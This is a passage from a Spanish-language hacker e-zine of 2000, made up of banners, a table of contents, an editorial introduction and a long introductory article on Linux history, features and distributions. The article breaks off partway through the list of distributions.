Copy Link
Add to Bookmark
Report
Knowledge's Slaves Hacker (Issue 2)
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
kSh kSh kSh kSh kSh kSh kSh kSh
§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§
kSh kSh kSh kSh kSh kSh kSh kSh
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@ @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@
// \\
// kkkkkkkk SSSSSSSSSSSSSSS hhhhhhh \\
// k::::::k SS:::::::::::::::S h:::::h \\
// k::::::k S:::::SSSSSS::::::S h:::::h \\
// k::::::k S:::::S SSSSSSS h:::::h \\
// k:::::k kkkkkkk S:::::S h::::h hhhhh \\
// k:::::k k:::::k S:::::S h::::hh:::::hhh \\
// k:::::k k:::::k S::::SSSS h::::::::::::::hh \\
// k:::::k k:::::k SS::::::SSSSS h:::::::hhh::::::h \\
// k::::::k:::::k SSS::::::::SS h::::::h h::::::h \\
// k:::::::::::k SSSSSS::::S h:::::h h:::::h \\
// k:::::::::::k S:::::S h:::::h h:::::h \\
// k::::::k:::::k S:::::S h:::::h h:::::h \\
// k::::::k k:::::k SSSSSSS S:::::S h:::::h h:::::h \\
// k::::::k k:::::k S::::::SSSSSS:::::S h:::::h h:::::h \\
// k::::::k k:::::k S:::::::::::::::SS h:::::h h:::::h \\
// kkkkkkkk kkkkkkk SSSSSSSSSSSSSSS hhhhhhh hhhhhhh \\
// \\
// E-zine Dominicano Knowledge's Numero 2 \\
// @@@@@@@@@@@@@@@@@@ Slaves Hacker @@@@@@@@@@@@@@@@@@ \\
//@@@@@@ @@@@@ @@@@@ @@@@@@@ \\
@@ @@@ 7 de Abril 2000 @@@ @@
@@@@@@@@@@@@@@@@@@@@@@@@@
CopyLeft¸ 2000
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
kSh kSh kSh kSh kSh kSh kSh kSh
§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§
kSh kSh kSh kSh kSh kSh kSh kSh
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
////////////////////////////////////////////////////////////////////////
<>.-k-S-h-.-.-k-S-h-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.<>
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
<>-<>-<>-<>-<>-<>-<>-<>-<><>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>- <>
<> Disponible en: http://kshezine.cjb.net <>
<> E-mail: ksh_team@bigfoot.com <>
<>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.<>
<> Integrantes: <>
<> <>
<> Editor -> MasterCrash < mcrash@iname.com > <>
<> Co-Editor -> Kralj Killer < kraljkiller@bigfoot.com > <>
<> Dise¤o -> Mastercrash <>
<> Sitio Web -> Mastercrash and Kralj Killer <>
<>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.<>
<>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.<>
<>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.<>
////////////////////////////////////////////////////////////////////////
<>.-k-S-h-.-.-k-S-h-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.-.-k-S-h-.<>
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
<>-<>-<>-<>-<>-<>-<>-<>-<><>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>
Recomendado: Editor de MS-DOS
Obra de tal manera que la humanidad en ti y en los demas
nunca sea un medio sino siempre el fin mas elevado.
Inmanuel Kant
Filosofo aleman
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
kSh kSh kSh kSh kSh kSh kSh kSh
§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§
kSh kSh kSh kSh kSh kSh kSh kSh
¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
/-/ /-/
/-/ CONTENIDO /-/
/-/ /-/
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /-/-/-/
/-/ Introduccion by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Intro a Linux by MasterCrash and Kralj Killer /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ BackOrifice II by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Jugando con el Bios II by MasterCrash and Kralj Killer /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Criptografia y sus ramas by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Guia del PGP 5.3.5 by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Bugs Dimension by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Mundo Virico by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Terminos hackers II by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Noticias by MasterCrash and Kralj Killer /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Derrumbando Muros de Ignorancia by MasterCrash /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Humor by MasterCrash and Kralj Killer /-/
/-/.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-/-/
/-/ Despedida by kSh Team /-/
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /-/-/-/
/-/ Llave PGP /-/ Al final aparece nuestra llave publica ;)
/-/-/-/-/-/-/-/-/-/-/-/
AGRADECIMIENTOS A OTROS E-ZINES:
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
* RareGaZz http://www.RareGaZz.acapulco.uagro.mx
~^~^~^~^
e-mail ---> <RareGaZz@iname.com>
Los cuales van por el e-zine #16.
* Proyecto R. En su nueva direccion http://www.cdlr.org ya van por el #8.
~^~^~^~^~^~
e-mail ---> <proyecto_r@bigfoot.com>
* InET http://www.warpedreality.com/inet
~^~^~
e-mail ---> <inet@warpedreality.com>
ya van por el #3
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ KNOWLEDGE's SLAVES HACKER ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
//\\_//\\_//\\_//\\_//\\
õ ©©©©©©©©©©©©©©©©©©©© õ
õ ®® INTRODUCCION ®® õ
õ ©©©©©©©©©©©©©©©©©©©© õ
//\\_//\\_//\\_//\\_//\\
A solo unos dias de cumplir un año ya de la salida de la primera entrega, ha
pasado mucho tiempo desde entonces, quizas por razones ajenas a mi voluntad no
pude darle continuidad a la revista como realmente deseaba.
Lo importante es que ESTAMOS AQUI, UNA VEZ MAS; con el COMPROMISO de llevarles,
como siempre, el mejor contenido hacking, con el mismo deseo o quizas mayor que
antes, esta vez con una vision mas tecnika, profundidad en los temas y el reto
cada vez mayor de superar a la anterior entrega, por supuesto! :)
Y que mejor manera de iniciar esta entrega, valga la redundancia con el David
de los S.O. "LINUX". Podran ver su historia y evolucion que ha tenido el mismo
y que en estos momentos esta despertando el interes de todos :o)
Una guia que los ayudara paso a paso en la instalacion, configuracion, caracteristicas,
sitios web relacionados con el tema, las distintas ditribuciones, asi como el
lugar de donde bajarlas, algunos conceptos, entre otras cosas...
Seguiremos a pasos de vencedores, DERRUMBANDO MUROS DE IGNORANCIA...
Seguiremos con gritos de silencio, en un mundo dominado por el gran hermano,
el causante de tanta adversidad...
Seguiremos en defensa del TERMINO HACKER, la llave que abre las puertas hacia
un mundo libre, lejos de toda ignorancia, una profunda filosofia, podria decir
toda una filosofia. La luz en la oscuridad que nos lleva por senderos de aventura
y curiosidad en aquel mundo del electron y el baudio, un juego tan real...
Nos ha costado mucho sacrificio y esfuerzo, horas incansables de trabajo pero
sentimos que ha valido la pena lo antes mencionado y es que quizas sea asi
por una frase que en lo personal siempre me ha gustado "NUESTRO CONOCIMIENTO ES
VALIOSO CUANDO SE COMPARTE CON LOS DEMAS..."
Esperamos que la misma sea de su agrado queridos lectores, y que cada bit de la
misma sea devorado por sus mentes y puedan saciar la sed de curiosidad y de
conocimiento que tanto anhelamos.
Agradecimientos a la SCENE HACKING LATINA que nos han brindado su apoyo...
Aquellos que pensaban que este magazine iba a desaparecer, siento desilucio-
narlos. Hay kSh pa' rato. ]:->
Espero que lo disfruten...!
_____ __
/ \ _____ _______/ |_ ___________
/ \ / \\__ \ / ___/\ __\/ __ \_ __ \
/ Y \/ __ \_\___ \ | | \ ___/| | \/
\____|__ (____ /____ > |__| \___ >__| \/ \/ \/ \/
_________ .__
\_ ___ \____________ _____| |__
/ \ \/\_ __ \__ \ / ___/ | \
\ \____| | \// __ \_\___ \| Y \
\______ /|__| (____ /____ >___| /
\/ \/ \/ \/
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~
Intro a Linux
~^~^~^~^~^~^~^~^~^~^~^~
~^~^~^~^~^~^~^~^~^~^~^~
Starting linux...
Linux Torvalds
--------------
Algo de su Vida...
Es el creador del Kernel de Linux, sistema operativo que esta dando mucho que hablar, muchos
usuarios estan instalando este maravilloso software en sus makinas, por tal motivo esta siendo
considerado amenaza profunda de Microsoft (con su winbugs), asi que Bill Gay y demas ladrones de
Microsoft cagense en los pantalones porque esta entrando Linux a la Carga (loading Linux...).
Este finlandes nacio en Helsinki en 1969 y se inicio en las makinas a los 10 anos (eso dicen...)
cuando su abuelo le compro un Commodore VIC-20 y llamo al viejo linus para que le ayudara en la
operacion de la makina. Asi se inicio Torvalds creando sus propios juegos, y en 1991 compro su
primera makina, pero al ver que el sistema que traia esta no le convencia mucho (traia el DOS),
y el de su universidad si (era Unix), decidio crear su sistema Unix para PC. Y se oriento con el
Minix, un Unix limitado.Esto fue lo que dijo linus Torvalds en una importante revista, "Durante
los meses que siguieron se acabaron las rumbas, los pasatiempos y las novias. Me converti en un
hombre que comia y dormia frente a mi makina".
Despues paso lo inesperado Torvalds ya tenia un Kernel con algo de errores, y lo publico gratis
en Internet, para que todos los programadores del mundo lo ayudaran a corregirlo y lo
distribuyeran.
Linus trabaja activamente hasta la versian 0.96, pues tras ello, se sumaron al proyecto mas
programadores y se forma un grupo de desarrollo amplio (Linux Developers) que continúa siendo
dirigido por él; pero como el mismo lo reconoce, su labor es mas la de un "router" del grupo
que la del desarrollo en si.
Linus Torvalds se llevo a su familia a Estados Unidos en febrero de 1998 y alli nacio su hija
Patricia Miranda.
En este momento Torvalds se encuentra trabajando como programador en Silicon Valley, para una
compania llamada Transmeta, la cual lanzo el procesador Crusoe.
Lo que Torvalds a hecho es revivir la idea del software de Libre distribucion...
El desarrollo del kernel del Linux, que es el corazon del sistema operativo, esta en constante
desarrollo y se encuentra soportado por una multitud de programadores comunicados a través de
Internet bajo la coordinacian de Linus Torvald; sin embargo, como el mismo lo reconoce, las
versiones actuales de kernel, salo tienen de un 5 a 10 por ciento de su propiedad. Esto
garantiza que el futuro del Linux no dependa de una sola persona, sino mas bien de un grupo
abierto de desarrolladores a nivel mundial.
-*-**-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*--*-
¿Que es LINUX?
---------------
Es un sistema operativo tipo Unix que funciona en computadores con procesadores de arquitectura
Intel (x86), y en otros como los k6 de AMD y el MII de Cyrix.
Ya hay versiones de Linux para otros procesadores como Alpha, Sparc y Power PC.
Las principales caracteristicas de Linux son:
----------------------------------------------
* Es multiprocesamiento: Esto es importante para servidores y estaciones de trabajo que necesitan
todo el potencial de un equipo para trabajar, lo que pasa es que el sistema operativo Linux
trabaja con varios procesadores al tiempo, cosa que no puede hacer el winbugs o los Mac OS.
* Es Multitarea: El usuario podra trabajar con varios procesos simultaneos, sin que estos
interfieran, al winbugs le llaman multitarea, pero resulta que para tenerlo corriendo con varias
aplicaciones al tiempo se necesita de bastante memoria RAM, llendo un poco mas lejos funciona
como una memoria virtual, siendo esto facil de comprobar al tratar de correr el Defragmentador
de disco y otras aplicaciones al mismo tiempo. Cosa que casi no es tan necesaria en
un sistema Linux, ya que este trabaja en modo consola con solo 4 - 8 MB y en XWindows con 8 - 16
MB, algunas empresas han experimentado hasta con 40 ventanas del navegador trabajando
simultaneamente.
* Es Multiusuario: Esto permite que una makina pueda ser compartida por varios usuarios, cada uno
con diferentes "privilegios" y sin acceso a la informacion de los demas. Asi, cada uno puede
trabajar como si se encontrara en una makina diferente. Existe un Superusuario (Root) que es el
que controla el acceso a todo el sistema, es quien crea a los otros usuarios, concediendoles
determinados accesos y recursos a la makina.
* Fue desarrollado a travez del protocolo TCP/IP, por tal su capacidad de conectividad es muy
amplia.
¿De que esta Compuesto Linux?
-----------------------------
*******************
* KERNEL *
*******************
+ Shell +
+++++++++++++++++++
- XFree86 -
-------------------
============= Entorno XWindows =============
= ................. .............. =
= . Administrador . . Escritorio . =
= . de Ventanas . <---> . . =
= ................. .............. =
============================================
Kernel: Es el nucleo del sistema, sus responsabilidades mas importantes son la administracion
de procesos y la administracion de archivos, sin embargo el Kernel esta encargado de muchas otras
cosas como la administracion de la E/S, que es esencialmente la comunicacion entre todos los
dispositivos perifericos y la CPU.
El Shell: Este es un interprete de comandos, pues es donde a travez el usuario se comunica con la
makina y ejecuta todas las instrucciones. El mas utilizado dentro de la comunidad Linux es Bash
(GNU Bourne - Again Shell) que se ha convertido practicamente en estandar y es compatible con
otros shell como PDKSH (Korn de dominio publico) y TCSH (version avanzada de un shell Unix deno
minado C).
XFree86: No es solamente un entorno grafico; es tambien un sistema cliente-servidor muy potente,
disenado para ejecutarse dentro de una red.
Entorno XWindows: Es un generico que quiere decir "entorno de ventanas", que el caso de Linux se
ha desarrollado gracias a un proyecto del MIT (instituto Tecnologico de Massachusetts) denominado
X11 (www.x11.org). Una implementacion de X11 denominada Xfree86 (www.xfree86.org) se ha
convertido en el servidor de Xwindows por excelencia. Las aplicaciones que corren dentro del
entorno Xwindows suelen ir precedidas por una X.
Administradores de Ventana: Hay varios como AfterStep, Enlightenment, WindowsMaker, BlackBox...
Escritorios: Los mas Importantes y trabajados por los linuxeros son KDE (www.kde.org) y Gnome
(www.gnome.org), son robustos escritorios que le permiten al usuario trabajar como si estuvieran
en WinBugs (win2...)
Directorios y Subdirectorios
----------------------------
Esta es la representacion del directorio principal o raiz y algunos subdirectorios...
/ (raiz)
|
|
|
|
---------------------------------------------------------------------------------------
| | | | | | | | | | | |
bin dev etc home lib lost+ mnt proc root sbin usr var
| found |
| |
| |
------------------------------------------------- |
| | | | | | | |
lilo httpd msgs rc.d skel sysconfig X11 |
|
|
|
-----------------------------------------------------------------
| | | | | | | | |
adm bin include lib local man src spool X11R6
|
|
|
-----------------------------------------
| | | | | |
kbd emacs npasswd uucp X11 yp
Historia ano tras ano de LINUX
-------------------------------
En 1991
~~~~~~~~
Torvalds empezo a crear un programa a mediados de abril y varios meses este se convirtio
en Linux, un sistema operativo Unix para PC. Torvalds tenia alrededor de 21 anos y estudiaba
ciencias de la computacion en la universidad de Helsinki (finlandia)... Este queria hacer una
version mejorada de su sistema Minix, que era un Unix reducido o limitado, y que fue creado por
un profesor Holandes para ensenar a sus estudiantes el funcionamiento de los sistemas operativos.
Torvalds dice que el no pensaba crear un software profesional sino solo un programa de uso
personal.
El 5 de octubre, Torvalds publico en un grupo de noticias sobre Minix, la presencia de Linux.
Ademas invito a todos los programadores que le enviaran las correciones del programa, y
fortalecerlo, asi fue como se empezo a difundir Linux en Internet, y miles de Hackers empezaron
la construccion del software que hoy es el Sistema Operativo por Excelencia...
En 1992
~~~~~~~~
En Enero Linux tenia cerca de 100 usuarios y varios de ellos ya participaban en el desarrollo de
linux con mejoras y correciones que enviaban a Torvalds por Internet. Torvalds lanzo ese mes la
version 0.12 de Linux, esta ya se desempenaba en algunos aspectos mejor que Minix y ya incluia
codigo de otros programadores.
Torvalds distribuyo Linux bajo un tipo de licencia llamada GPL, que permite a cualquier persona
bajar, usar, modificar e incluso vender Linux, sin pagar Nada; la unica condicion es que los
cambios o mejoras que una persona o compania realice deben ser publicos.
Programadores en todo el mundo empezaron a mejorar el Kernel y a enviar controladores para el
Linux, tambien llegaba muchos errores para que Torvalds los corrigiera.
A finales del 92 se calcula que habia cerca de 1200 usuarios de Linux...
En 1993
~~~~~~~~
Para manejar todas esas colaboraciones de las personas que le enviaban codigo, Torvalds elegio
cerca de 5 personas para labores de revision, quienes se convirtirian en sus companeros
"oficiales".
En estos tiempos Linux empezaba a espandirse rapidamente y las mejoras del programa
eran casi que semanales.
Se calcula que a finales del ano Linux completo 21.000 usuarios en el mundo...
En 1994
~~~~~~~~
Se lanzo la primera version completa del Linux 1.0, esta version ofrecia soporte de Redes e
incluyo docenas de herramientas y utilidades.
Se fundo Red Hat Software, una empresa que hoy es el principal distribuidor de Linux.
Este ano Linux completo aproximadamente 100.000 usuarios...
En 1995
~~~~~~~
La gente que trabajaba con los sitemas win2 empezaba a reconocer que era un software mas
robusto y potente, muchas de ellas sobre todo informaticos empezaron a tener su Unix en casa...
Linux completaba cerca de 600.000 usuarios.
En 1996
~~~~~~~~
Se lanzo la version 2.0 de Linux, esta ya utilizaba el poder del multiprocesamiento y se empezo
a difundir para los procesadores Alpha.
En este ano Linux tenia cerca de 1'500.000 usuarios...
En 1997
~~~~~~~
Se lanzo la version 2.1, y la firma Datapro dijo que Linux era el segundo sistema operativo mas
popular en servidores web de Internet, despues de Solaris.
Torvalds se fue a vivir a Santa Clara (California, Estados Unidos), ya que fue contratado por la
compania Transmeta, a pesar de eso Torvalds continuo trabajando para Linux.
Linux Completo cerca de 3'600.000 usuarios...
En 1998
~~~~~~~~
Varios fabricantes de programas para el mercado corporativo, como Netscape, Informix, Oracle,
anunciaron que lanzaran versiones de su programas para Linux.
Netscape e Intel invirtieron capital a la empresa Red Hat, esto ayudo a que Linux se consolidara
y aumentara la credibilidad en Linux.
Corel Corporation lanzo su procesador de palabras Word Perfect 8 para Linux, el programa se
coloco en Internet y en los primeros meses lo bajaron mas de un millon de personas.
Se calcula que Linux completo cerca de 8'300.000 usuarios...
En 1999
~~~~~~~~
En enero se lanzo la version 2.2 de Linux, que ofrecio un mejor soporte para procesadores Sparc,
Motorola 68000, PowerPC. Esta version soporta hasta 8 procesadores.
Corel Corporation lanzo su version Beta de Linux, una distribucion dirigida a Usuario de PC, y
gente acostumbrada al Win2, utiliza un escritorio KDE.
Varios de los fabricantes de computadores, como Dell Computer, Compaq Y Hewlett - Packard, estan
vendiendo equipos con Linux preinstalado.
Se calcula que para este ano Linux tenia cerca de 11'000.000 de usuarios...
En el 2000
~~~~~~~~~~~
Linus Torvalds anuncia a través de la lista de correo del Kernel que este fin de semana sera
liberado el nuevo Kernel 2.3.51 el cual tiene mucho de especial debido a que sera el último
Kernel con numeral 2.3.x y posteriormente se pasara a las versiones pre-2.4
Ya esta disponible la última versian (4.72) del Netscape Communicator para Linux. Como es
habitual en estos casos, se distribuye en formato completo y con el navegador únicamente.
Según un correo de la lista del Kernel que se publica en la pagina de LinuxToday, Alan Cox ya
libera la lista de lo que hay que lograr para el Kernel 2.4 de Linux, que esta bastante atrasado
según los primeros tentativos de fecha que manifestara Torvalds el ano pasado.
Todavia no hay cifras exactas de cuantos usuarios Linux puedan haber en el momento, pero se
calcula si no hay mas, si no hay menos unos 15'000.000 de usuarios
-*-**-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*--*-
Linux en PC tiene las siguientes caracteristicas:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- Corre en una 386sx con 4mb de RAM sin disco duro, aunque se recomienda una 386/33 con 8mb
de RAM y un disco duro de 200mb.
- Corre totalmente en modo protegido, y ejecuta exclusivamente cadigo de 32 bits. Actualmente
ya esta listo para soportar el codigo de 64 bits la ultima generacion de los nuevos
procesadores Itanium de Intel :))))
Utiliza de esta manera todo el poder de los procesadores 386 y superiores.
- Soporta memoria virtual, librerías compartidas, carga en demanda de ejecutables, memoria
compartida con 'copy-on-write', multiprocesamiento simétrico(SMP), etc.
- Soporta arquitecturas ISA, EISA, VLB, PCI. No soporta MicroChannel.
- Soporta todas las tarjetas IDE/EIDE y SCSI(SCSI I, SCSI II, Wide SCSI, Ultra-Wide SCSI, etc.)
en el mercado. Los drivers para hardware nuevo aparecen en cuestian de días.
- Soporta la mayoría de las tarjetas de red conocidas.
- Soporta la mayoría de las tarjetas de sonido y CD-ROMs en el mercado.
- Tiene soporte para muchos tipos de sistemas de archivos, entre ellos FAT, VFAT, UMSDOS, HPFS, Minix, System V(Coherent, SCO UNIX, UnixWare, XENIX, etc.), extfs, ext2, xiafs, NFS, iso9660(el utilizado en los CD-ROMs), etc.
- Soporta muchos protocolos de red, entre ellos TCP/IP, Appletalk, Samba(para maquinas con
Windows Network como WFW, NT, etc.), Token Ring, etc. Un mismo servidor Linux puede soportar
todos estos protocolos simultaneamente a la perfeccian, pudiendo conectarse a cualquier tipo de
maquinas cliente.
- Como ambiente grafico utiliza el X-Window System(el mismo utilizado en las estaciones de
trabajo UNIX como Sun, Silicon Graphics, HP, DEC, etc.). Las distribuciones vienen con el XFree86,
que es una versian gratuita de X. XFree86 soporta la mayoría de las tarjetas de video en el
mercado, incluyendo tarjetas aceleradoras, y las aprovecha al maximo, mucho mejor que cualquier
sistema operativo comercial.
- Existen emuladores para programas de DOS(DOSEMU; hasta puede correr los juegos mas grandes),
Windows(Wine, todavía en desarrollo, aunque corre casi todo el MS Office con algunos pequenos
problemas), Macintosh(Executor), etc. También puede correr directamente los programas de SCO
UNIX, UnixWare de Novell, XENIX, Coherent, etc.
- Existen versiones de Linux para muchas otras plataformas, entre ellas DEC Alpha, MIPS,
PowerPC, Motorola 68k, SPARC, UltraSPARC, Acorn, etc., todas ellas con multiprocesamiento
simétrico. Incluso se estan desarrollando versiones de Linux para maquinas masivamente
paralelas(supercomputadoras con cientos o miles de procesadores trabajando en paralelo).
- Todo esto viene con cadigo fuente para poder ser recompilado, examinado, modificado, etc.
Esto no lo ofrece ningún sistema comercial. No es necesario meterse a programar ni a tocar
el cadigo fuente si no queremos; existen muchísimos usuarios de Linux que no saben programar
y aún así estan muy contentos con el sistema.
- La comunidad de Linux nos ofrece un excelente soporte técnico, muchísimo mejor que las
companías de sistemas comerciales. Por poner un ejemplo... al hablar al soporte técnico de
Microsoft, una de las primeras cosas que nos preguntan es el número de nuestra tarjeta de
crédito. Al hablar al soporte técnico de SCO, nos dicen que mejor nos venden un tutorial para
el sistema operativo. El soporte técnico de IBM frecuentemente no sabe de lo que le estamos
hablando.
En USENET existen mas de 30 foros de discusian y soporte para Linux, mientras que(por ejemplo)
para Windows hay menos de 5 foros. Existen varias decenas de listas de correo(maling lists)
sobre el desarrollo, soporte, discusian, y otros temas sobre Linux. Existen varios libros en
línea e impresos sobre el sistema. Mucha de la mejor documentacian para Linux forma parte del
Linux Documentation Project(LDP), que son libros en línea gratuitos.
DISTRIBUCIONES LINUX
=====================
Que son las distribuciones?
no son mas que implementaciones de Linux, beneficiandose de que justamente su cadigo es libre,
a las cuales se le incorpora paquetes de software generalmente GNU o bajo licencia GPL y con
algunas herramientas de ayuda para la configuracian y administracian del sistema operativo.
Resumiendo esto :)
Algunas empresas desarrollan el Linux a su gusto, esto quiere decir: agregan programas, utilerias
modifican algunas cosas como la instalacion y archivacion de ficheros.
Pero en si el Linux sigue siendo el mismo...
Algunas de estas empresas colocan sus distribuciones en sus sitios web para que los que quieran
la puedan bajar, pero se necesita de mucho tiempo y paciencia para realizar esa tarea, pues los
archivos en total pueden ocupar cientos de megas. Por tal motivo venden las distribuciones en CD
a un precio que puede estar alrededor de los 5 a 70 dolares, en estos casos Linux viene con sus
manuales de instalacion y soporte tecnico por si hay alguna dificultad y en ocaciones con varios
CD donde vienen programas utilitarios y herramientas de evaluacion.
Algunas de las principales Distribuciones son:
Red Hat Linux
--------------
Es la distribucion mas conocida de linux. Esta dirigida principalmente a empresas. Las versiones
recientes de esta distribucion (Red Hat 6.2) trae los entornos KDE y Gnome, estos programas le
dan una apariencia grafica igual al MacOS o Win2, trae el StarOffice 5.1 y el reconocido Apache.
- Precio: Se puede bajar gratis de Inet, hay una version standard que vale 30 dolares, la Deluxe
cuesta 80 dolares y la profesional 150 dolares.
- Sitio Web: http://www.redhat.com
Corel Linux
-----------
Esta distribucion se basa en el Linux de Debian, se lanzo el 15 de Noviembre del 99, es producida
por Corel Corporation, una de las mayores empresas de Software del Mundo.
Esta distribucion se caracteriza porque mas que todo quiere cautivar a los usuarios de Win2, ya
que trae una Instalacion facil, y un entorno como KDE que es parecido al WinBugs.
Incluye el Word Perfect 8, un navegador, y una herramienta para actualizar el programa por Inet.
- Precio: Alrededor de los 10 dolares.
- Sitio Web: http://www.linux.corel.com
SuSe Linux
----------
Esta distribucion es muy difundida en Europa. Es la distribucion de Linux que mas programas
incluye: 1.300 en seis CD-ROM. Usa los ambientes KDE y Gnome, y trae el paquete de programas
StarOffice.
- Precio: Alrededor de los 50 dolares.
- Sitio Web: http://www.suse.com
Debian Linux
------------
Esta elaborada por el esfuerzo de muchos programadores sin animo de lucro, todos son voluntarios.
Se caracteriza por ser una distribucion de compleja instalacion pues se necesitan tener
conocimientos tecnicos.
No se Recomienda a personas que llegan al Mundo Linux...
- Precio: Se consigue por precios tan bajos, y se puede bajar gratis de Inet.
